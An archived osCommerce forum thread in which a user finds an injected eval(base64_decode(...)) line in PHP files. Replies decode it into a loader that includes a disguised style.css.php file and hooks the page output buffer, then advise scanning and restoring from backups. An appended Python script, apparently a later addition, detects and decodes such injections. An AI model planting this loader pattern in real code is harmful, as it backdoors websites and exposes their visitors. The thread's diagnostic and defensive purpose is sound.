osCommerce

The e-commerce.

What is this strange code?


xprt007

Hi

 

I noticed some strange code I don't remember seeing before at the top of some files I opened, including application_top.php & column_right.php.

 

Here is a sample:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2FmcmlxdWUxL3B1YmxpY19odG1sL2RydXBhbC9zaXRlcy9kZWZhdWx0L21vZHVsZXMvaW1hZ2UvY29udHJpYi9pbWFnZV9nYWxsZXJ5L3ZpZXdzL3RoZW1lL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

 

Is it normal & if not, would it mean the site was hacked?

 

Thanks in advance & regards.

Link to comment
Share on other sites

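You have been hacked. Here is the code:

if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
    // The 'mfsn' global doubles as a run-once guard and holds the path of the file to load
    $GLOBALS['mfsn'] = '/home/afrique1/public_html/drupal/sites/default/modules/image/contrib/image_gallery/views/theme/style.css.php';
    if (file_exists($GLOBALS['mfsn'])) {
        include_once($GLOBALS['mfsn']);
        if (function_exists('gml') && function_exists('dgobh')) {
            // dgobh() becomes the output-buffer callback, so it receives the page output
            ob_start('dgobh');
        }
    }
}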

Link to comment
Share on other sites

Thanks for your very informative responses.

 

That is no good news as it means practically spending lots of hours of extra work on a site that was going to be handed over to a client.

Is this just bad luck to have been hacked at this time or is Oscommerce that vulnerable?

If this particular vulnerability is known, why are there no better defenses or the suggested measures above not applied to the code?

Anyway, I don't know Oscommerce enough to criticize it. I'm more at home with Drupal CMS & there such issues are handled differently.

 

Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected. >_< :blink: :'(

If I have more questions ...

 

Once again, thanks & regards :thumbsup:

Link to comment
Share on other sites


You can also try this contribution: osCommerce VTS

It's a Virus & Threat Scanner for osCommerce that can help you find infected files if you want to.

Link to comment
Share on other sites


Hi

I am on a shared server. As I see in the readme file, the script works there as well.

Apart from scanning, what does it do? Can it delete the located bad files? In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced. How would this help me at this stage? I'm sure it is worth having AFTER the clean up.

 

Thanks & regards

Link to comment
Share on other sites


It does nothing more than scan and report possible threats in your files. You have to manually erase files or code from files.

If hundreds or thousands of files are infected, then erase your whole site and reinstall from earlier backups.

If you don't have up to date backups it could be worth trying this contribution.

Link to comment
Share on other sites
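A sketch of the scan-and-report step discussed above, as an added example that is not part of the original thread and is not the code of osCommerce VTS. It finds `eval(base64_decode('...'))` calls in PHP files, decodes the argument without executing it, and lists any absolute `.php` path the payload refers to; the names `scan_tree` and `demo` and the sample tree are assumptions constructed for illustration.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) as in the sample posted in the thread.
INJECTION = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# Quoted absolute paths to .php files inside the decoded payload (the file it includes).
PHP_PATH = re.compile(rb"'(/[^']+\.php)'")


def scan_tree(root):
    """Report every eval(base64_decode(...)) in *.php under root; decode only, never execute."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        for m in INJECTION.finditer(path.read_bytes()):
            try:
                payload = base64.b64decode(m.group(2))
            except binascii.Error:
                payload = b""  # not valid base64: the match is still reported
            findings.append({
                "file": path.relative_to(root).as_posix(),
                "offset": m.start(),
                "payload": payload.decode("utf-8", "replace"),
                "included": [p.decode() for p in PHP_PATH.findall(payload)],
            })
    return findings


def demo():
    """Scan a constructed two-file tree: one clean file, one with an injected first line."""
    # Constructed payload with the same shape as the decoded code in the thread.
    payload = (b"if(!isset($GLOBALS['k'])){$GLOBALS['k']='/srv/example/style.css.php';"
               b"include_once($GLOBALS['k']);}")
    injected = b"<?php /**/eval(base64_decode('" + base64.b64encode(payload) + b"')); ?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        (root / "includes" / "column_right.php").write_bytes(injected + b"<?php echo 'box'; ?>\n")
        (root / "index.php").write_bytes(b"<?php echo 'clean'; ?>\n")
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f["file"], "offset", f["offset"], "includes", f["included"])
```

The `included` paths are worth checking by hand, since in this thread the injected code loaded a second file stored in a different application's folder.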

I have another question:

Is the database also infected by this code?

In that case, I would just delete the files, upload new oscommerce files ...

 

Normally it is not. The code you showed us does not alter the database.

You should do a scan and see if there is more.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.
